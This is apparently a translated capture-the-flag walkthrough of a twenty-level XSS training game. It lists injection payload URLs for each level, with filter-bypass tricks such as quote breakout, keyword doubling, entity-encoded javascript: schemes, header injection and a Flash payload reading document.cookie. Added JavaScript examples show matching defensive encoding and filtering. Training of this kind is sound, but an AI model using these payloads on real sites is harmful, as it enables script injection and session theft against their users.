XSS Challenge 1

Explanation

An online XSS practice platform. Address: http://test.xss.tv/

XSS usage summary (js)

AwesomeXSS

Conventional XSS approach:

1. First find the injection point

2. Find the output point

3. Keep adjusting the payload according to where and in what format the output is displayed

LEVEL-1

payload

http://test.ctf8.com/level1.php?name=%3Cscript%3Ealert(/xss/)%3C/script%3E
http://test.ctf8.com/level1.php?name=%3Csvg/onload=alert(1)%3E
http://test.ctf8.com/level1.php?name=%3Cimg%20src=1%20onerror=alert(1)%3E
http://test.ctf8.com/level1.php?name=%3Ca%20href=%22javascript:alert(1)%22%3Etest%3C/a%3E

LEVEL-2

Obviously the angle brackets in the output above (the heading) are filtered, but those in the output below (the input box) are not.

In PHP, a variable inside single quotes is not interpolated.

A variable inside double quotes is interpolated, so it is enough to close the double quote.

payload

http://test.ctf8.com/level2.php?keyword=%22%3E%3Cimg%20src=1%20onerror=alert(1)%3E
http://test.ctf8.com/level4.php?keyword="onclick="window.alert()

LEVEL-3

The htmlspecialchars() function converts predefined characters into HTML entities.

The predefined characters are:

& (ampersand) becomes &amp;
" (double quote) becomes &quot;
' (single quote) becomes &#039;
< (less than) becomes &lt;
> (greater than) becomes &gt;

payload

http://test.ctf8.com/level3.php?keyword=%27onclick%3D%27window.alert%28%29&submit=%E6%90%9C%E7%B4%A2
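As an added example (not code from the original write-up): a JavaScript model of PHP's htmlspecialchars() that shows why a close-the-double-quote payload of the level 2 kind is stopped once the attribute value is encoded, while the level 3 single-quote payload still breaks out. Without ENT_QUOTES (the default before PHP 8.1) the single quote is not converted; with ENT_QUOTES (the default from PHP 8.1 on) it becomes &#039;. The attribute template, the entQuotes flag and the breaksOut check are assumptions of the example; the two payloads are the ones from the write-up, URL-decoded.

```javascript
// Added example, not from the original write-up: a model of PHP's
// htmlspecialchars() used to compare the level 2 and level 3 attribute contexts.
// entQuotes=false models the pre-8.1 default (ENT_COMPAT: & " < > only);
// entQuotes=true models ENT_QUOTES, which also encodes the single quote.
function htmlSpecialChars(value, entQuotes) {
  let out = value
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
  if (entQuotes) out = out.replace(/'/g, '&#039;');
  return out;
}

// Render the value into an attribute delimited by `quote` (assumed template:
// level 2 echoes into a double-quoted value attribute, level 3 into a
// single-quoted one).
function renderAttribute(value, quote, entQuotes) {
  return `<input name="keyword" value=${quote}${htmlSpecialChars(value, entQuotes)}${quote}>`;
}

// A value "breaks out" of its attribute when, after encoding, it still contains
// the delimiter quote: the browser would then see the rest as new attributes.
function breaksOut(value, quote, entQuotes) {
  return htmlSpecialChars(value, entQuotes).includes(quote);
}

// Payloads from the write-up above, decoded from their URL form.
const LEVEL2_PAYLOAD = '"><img src=1 onerror=alert(1)>';
const LEVEL3_PAYLOAD = "'onclick='window.alert()";

// Double-quoted attribute + encoding: level 2 payload is neutralised.
console.log(renderAttribute(LEVEL2_PAYLOAD, '"', false));
// Single-quoted attribute, default flags: level 3 payload breaks out.
console.log(breaksOut(LEVEL3_PAYLOAD, "'", false));
// Single-quoted attribute, ENT_QUOTES: it no longer does.
console.log(breaksOut(LEVEL3_PAYLOAD, "'", true));
```

The practical rule this illustrates: encode for the exact context you write into, and when the delimiter is a single quote, htmlspecialchars() must be called with ENT_QUOTES (or the attribute must be double-quoted).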

LEVEL-4

payload

http://test.ctf8.com/level4.php?keyword=%22onmouseover=%22alert(1)

LEVEL-5

However, the code does not filter the < and > characters, so we can use the href attribute of an a tag to construct the pop-up payload.

payload

http://test.ctf8.com/level5.php?keyword=%22%3E%20%3Ca%20href=%22javascript:alert(1)%22%3Exss%3C/a%3E

LEVEL-6


payload

http://test.ctf8.com/level6.php?keyword=%22ONclick%3D%22window.alert%28%29&submit=%E6%90%9C%E7%B4%A2

LEVEL-7


payload

http://test.ctf8.com/level7.php?keyword=%22%3E%3CScrscriptipt%3Ealert(1)%3C/Scriscriptpt%3E
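An added example, not part of the original write-up, modelling the keyword filters that the level 6 and level 7 payloads get past: a case-sensitive match lets ONclick through, and a single removal pass turns Scrscriptipt back into Script. The keyword list is an assumption. The functions show the minimum a removal filter needs (case-insensitive matching, repeated until the string stops changing); even then, encoding the output as in level 3 is the more reliable control, because a removal filter only ever knows the keywords it was given.

```javascript
// Added example, not from the original write-up: two keyword filters compared.
// KEYWORDS is an assumed list modelled on what the levels appear to block.
const KEYWORDS = ['script', 'onclick', 'onerror', 'onload', 'href'];

// Model of the weak filter: exact-case match, each keyword removed once.
function stripOnceCaseSensitive(input) {
  let out = input;
  for (const kw of KEYWORDS) out = out.split(kw).join('');
  return out;
}

// Case-insensitive removal repeated until nothing changes, so a keyword that
// is reassembled by an earlier removal is removed too. Every pass shortens the
// string or leaves it unchanged, so the loop terminates.
function stripToFixedPoint(input) {
  let prev;
  let out = input;
  do {
    prev = out;
    for (const kw of KEYWORDS) out = out.replace(new RegExp(kw, 'gi'), '');
  } while (out !== prev);
  return out;
}

// Detection helper: does any keyword survive, ignoring case?
function containsKeyword(s) {
  const lower = s.toLowerCase();
  return KEYWORDS.some((kw) => lower.includes(kw));
}

// Payloads from the write-up above, decoded from their URL form.
const LEVEL6_PAYLOAD = '"ONclick="window.alert()';
const LEVEL7_PAYLOAD = '"><Scrscriptipt>alert(1)</Scriscriptpt>';

console.log(stripOnceCaseSensitive(LEVEL6_PAYLOAD)); // unchanged: ONclick != onclick
console.log(stripOnceCaseSensitive(LEVEL7_PAYLOAD)); // "><Script>alert(1)</Script>
console.log(stripToFixedPoint(LEVEL7_PAYLOAD));      // "><>alert(1)</>
```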

LEVEL-8


The part after the javascript: pseudo-protocol can be URL-encoded.
For example, <a href="javascript:%61lert(1)">click me</a> successfully pops a dialog.
With img it does not work: <img src=1 onerror="javascript:%61lert(1)">
This is because the href attribute navigates to the URL it contains and therefore URL-decodes it, whereas the onerror attribute only executes JS and does not navigate. In addition, the URL-encoded part can be entity (HTML entity) encoded once more:
<a href="javascript:%61lert(1)">click me</a>

payload

http://test.ctf8.com/level8.php?keyword=javascri%26%23x0070%3Bt%3Aalert%28%29&submit=%E6%B7%BB%E5%8A%A0%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5

LEVEL-9

The filter only checks that http is present, but the http must not actually take effect, so put it inside a comment.

payload

http://test.ctf8.com/level9.php?keyword=javascri%26%23x0070%3Bt%3Aalert%281%29%2F*http%3A%2F%2Fwww.baidu.com*%2F&submit=%E6%B7%BB%E5%8A%A0%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5
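An added example (not code from the original write-up) for levels 8 and 9: an href check that normalises the value the way the browser does before deciding on the scheme. The HTML parser decodes character references such as &#x0070; before the value reaches the URL parser; the URL parser strips tab, newline and CR and leading/trailing whitespace; and the scheme is matched case-insensitively. The scheme itself is never percent-decoded, so the check does not need to percent-decode (only the body of a javascript: URL is, which is what level 8 relies on). A "contains http" test like level 9's is satisfied by the comment in the payload and is included for contrast. The scheme allowlist and the small named-reference table are assumptions.

```javascript
// Added example, not from the original write-up: scheme allowlisting for an
// href value, normalised as the HTML and URL parsers would normalise it.

// Assumed, deliberately small subset of named character references.
const NAMED_REFS = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", colon: ':' };

// Step 1: decode numeric (&#112; &#x70;) and the named references above.
function decodeHtmlRefs(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isNaN(cp) ? match : String.fromCodePoint(cp);
    }
    const named = NAMED_REFS[body.toLowerCase()];
    return named === undefined ? match : named;
  });
}

// Step 2: remove ASCII tab/newline/CR anywhere and trim the ends, as the URL
// parser does before it reads the scheme.
function normalizeUrl(rawHref) {
  return decodeHtmlRefs(rawHref).replace(/[\t\n\r]/g, '').trim();
}

// Step 3: allowlist the scheme. Assumed allowlist for this example.
const ALLOWED_SCHEMES = ['http', 'https', 'mailto'];

function isSafeHref(rawHref) {
  const url = normalizeUrl(rawHref);
  // Scheme characters per the URL standard: ASCII alphanumerics, '+', '-', '.'.
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (!m) return true; // relative URL: there is no scheme to abuse
  return ALLOWED_SCHEMES.includes(m[1].toLowerCase());
}

// The level 9 style check, for contrast: it looks for the substring only.
function naiveContainsHttp(rawHref) {
  return rawHref.includes('http');
}

// Values from the write-up above, decoded from their URL form.
const LEVEL8_HREF = 'javascri&#x0070;t:alert()';
const LEVEL9_HREF = 'javascri&#x0070;t:alert(1)/*http://www.baidu.com*/';

console.log(normalizeUrl(LEVEL8_HREF));       // javascript:alert()
console.log(isSafeHref(LEVEL8_HREF));         // false
console.log(naiveContainsHttp(LEVEL9_HREF));  // true  (the naive check is fooled)
console.log(isSafeHref(LEVEL9_HREF));         // false (the normalised check is not)
```

The allowlist is the important part: a denylist of "javascript" strings would have to anticipate every encoding the parsers undo, whereas an allowlist applied after normalisation only has to recognise the few schemes the page actually needs.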

LEVEL-10

payload

http://test.ctf8.com/level10.php?keyword%20=%20test&t_sort=%22type=%22text%22%20onclick%20=%20%22alert(1)

LEVEL-11

payload

Referer: "onclick=alert(1) type="text"  // the added Referer header

LEVEL-12

payload

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 " onclick=alert(1) type="text

LEVEL-13



payload

user=call+me+maybe%3F " onclick=alert(1) type="text"

LEVEL-14



View the source and click through.

This level is currently offline and cannot be done; I will look at it later.

LEVEL-15



payload

http://127.0.0.1/xss练习小游戏/level15.php?src='level1.php?name=<img src=x onerror=alert(1)>'

LEVEL-16


payload

http://127.0.0.1/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F/level16.php?keyword=%3Cimg%0dsrc=1%0donerror=alert()%3E

LEVEL-17


Angle brackets and double quotes are filtered; trigger it with an on-event handler.

payload

http://127.0.0.1/xss练习小游戏/level17.php?arg01=a&arg02=b%20onclick=alert(1)

LEVEL-18


payload

http://127.0.0.1/xss练习小游戏/level18.php?arg01=a&arg02=%20onclick=alert(1)

LEVEL-19

Levels 19 and 20 require Flash analysis.


payload

http://127.0.0.1/xss练习小游戏/level19.php?arg01=version&arg02=%3Ca%20href=%22javascript:alert(document.domain)%22%3Exss_by_SST%3C/a%3E

LEVEL-20


For details refer to the FreeBuf write-up.
Flash XSS is indeed rarely encountered now; this counts as one of the few Flash-based XSS cases.

payload

http://127.0.0.1/xss练习小游戏/level20.php?arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//%26width%26height

Origin www.cnblogs.com/howtime/p/12500295.html